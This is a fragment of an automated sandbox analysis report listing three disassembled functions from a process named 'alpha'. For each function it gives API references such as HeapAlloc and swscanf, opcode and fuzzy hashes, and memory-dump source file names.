                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsnicmpswscanf
                                      • String ID: :EOF
                                      • API String ID: 1534968528-551370653
                                      • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                      • Instruction ID: a338ac204efeab682d9f01ce4e6a564f7c1f5730d90bd022c0f100bf81e2da97
                                      • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                      • Instruction Fuzzy Hash: 7E318EBBA08A4786EA54AB15A8402B8F2E1EF45F68FCC5131DE4D46291DF2CE8518760
                                      Function 00007FF755CAB62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 3$3
                                      • API String ID: 0-2538865259
                                      • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                      • Instruction ID: 6a1b9dc1803faafaf6e58c2a64f691cfc11a786924436772f77c7bc4760ac46e
                                      • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                      • Instruction Fuzzy Hash: 56013CFFD095838AF3597B60D8842B8FA60BF80F1DFDC4939C41E015A1DF2C6485A660
                                      Function 00007FF755CB06C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06D6
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06F0
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB074D
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB0762
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID:
                                      • API String ID: 1617791916-0
                                      • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                      • Instruction ID: 249c2fd2851999f46b1e78e4f027ebbc0ec1d47b42b9ae21bdae294c4d01dafb
                                      • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                      • Instruction Fuzzy Hash: 124168BBA0964386EA55AB10E44417EF7A4EF85F98BCC8038CA4E17794DF3DE840C760